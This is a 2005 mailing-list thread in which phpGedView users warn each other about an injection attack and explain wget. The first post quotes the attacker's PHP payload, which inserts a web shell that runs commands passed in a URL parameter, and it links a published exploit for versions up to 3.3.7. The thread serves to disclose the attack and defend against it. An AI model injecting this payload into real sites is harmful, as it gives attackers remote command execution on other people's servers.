Re: [Phpgedview-talk] attack attempt
Brought to you by:
canajun2eh,
yalnifj
Menu
▾
▴
Re: [Phpgedview-talk] attack attempt
|
From: Matthew G. <ma...@po...> - 2005-12-20 20:07:07
|
wget is a command line tool for downloading web pages. You can use it for
mirroring pages (making local copies of pages) and all sorts. It's a very
useful little tool, and is commonly installed on unix-like operating
systems. In this case the attacker is trying to use it to download some
program (to do something - who knows what, but I bet it's not friendly).
On Tuesday 20 Dec 2005 20:57, Heike El-Ashi - Tromp wrote:
> Hi Matthew,
> had an attack also.
> I am using 3.2.2. final.
> What is this wget?
> Regards,
> Heike
>
> Matthew Gates <ma...@po...> schrieb:
> Hi all,
>
> I had a curious user request on my phpGedView site. Looks like they're
> attempting some PHP injection style attack, using PHP code in the email
> address and other field in the user table, like this:
>
> \';error_reporting(0);if(isset($suntzu))
> {system($_GET[suntzu]);die(\'HiMaster!\');}echo\'
>
> >From my log files it looks like the attacker was trying to download a
> > linux
>
> binary and a PHP script using wget. I grabbed the target files and can
> provide a sample if anyone is interested in trying to un-pick what they do
> (know a good linux dis-assembler?).
>
> Doesn't look like they managed to do anything nasty, probably because wget
> isn't available on my server. Just a heads up for everyone to keep an eye
> out. Grep your logs for wget.
>
> I reported the incident to SANS and they said they have seen it and sent
> me this link, which looks like a published version of the exploit:
>
> http://www.milw0rm.com/id.php?id=1379
>
> ...which claims to affect versions <= 3.3.7. I'm using phpGedView v3.3.4
> final, so I think I would have been infected if I had had wget installed.
> Watch yourselves!
>
> I'm guessing we need a patch of some sort.
>
> Regards,
|
